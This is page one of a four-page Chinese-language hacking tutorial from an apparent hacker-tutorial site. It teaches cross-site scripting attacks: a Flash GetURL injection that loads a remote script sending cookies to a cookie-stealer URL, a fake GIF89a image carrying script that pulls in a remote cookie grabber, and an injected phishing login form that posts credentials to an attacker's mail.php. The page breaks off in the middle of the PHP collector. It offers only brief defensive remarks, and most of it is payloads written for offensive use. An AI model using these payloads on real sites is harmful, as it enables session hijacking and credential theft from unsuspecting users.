用flash窃取cookie?
不是，但有技术的做:
如:
在一个FLASH文件:
GetURL("http://www.victime.com/page.php?var=<script src='http://www.lvoelaozang.cn/hack.js'></script>","_self";

在这个hack.js文件里面有如下代码:
document.location="http://hax0r.com/cookiestealer.php?cookie="+document.cookie;

这个解决方法很简单:就是禁止flash文件在你的WEB应用上使用.

兴个例子,我们来新建一个hack.gif文件.然后用记事本打开文件,删除所有的内容,然后写入代码
GIF89a<script>alert("XSS"</script>

保存退出.
上传hack.gif到相就的地方...此时跨站发生
不要用Mozillia Firefox来访问那张图片,Mozillia 不会执行我们的alert.要用Internet explorer.

为什么添加GIF89a ?
因为很多上传程序会来检查我们的gif文件是否包含 'GIF89a',如果包括则认为是gif文件.
GIF89a<script src="http://lovelaozang.cn/cookiegrabber.php"></script>

我们需要知道一些其它格式图片,头部所包含的代码.

PNG = ‰PNG
GIF = GIF89a
JPG = ÿØÿà JFIF
BMP = BMFÖ

为了安全不要仅仅只检查getimagesize()

你是否明白什么是钓鱼？什么是XSS？

在这个例子里，有必需找到一个易受攻击的网站去XSS并注入那里，身于一种形式，以自己直接在网址以下代码
<p>Enter your login and password, thank:</p>
<form action="http://hax0r.com/mail.php">
<table><tr><td>Login:</td><td><input type=text length=20 name=login>
</td></tr><tr><td>assword:</td><td>
<input type=text length=20 name=password>
</td></tr></table><input type=submIT value= OK >
</form>

这个通过这个模仿的表单，然后利用mail.php通过电子邮件把表单里的数据发送给你。
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 TransITional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-
transITional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Error</tITle>
<style type="text/css">

</style></head>
<?php
$login = $HTTP_GET_VARS["login"];
$password = $HTTP_G

上一页 [1] [2] [3] [4] 下一页

文章录入：二少责任编辑：放弃

上一篇文章：一个VBS病毒生成器核心代码

下一篇文章：黑客技术入门：命令的使用

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】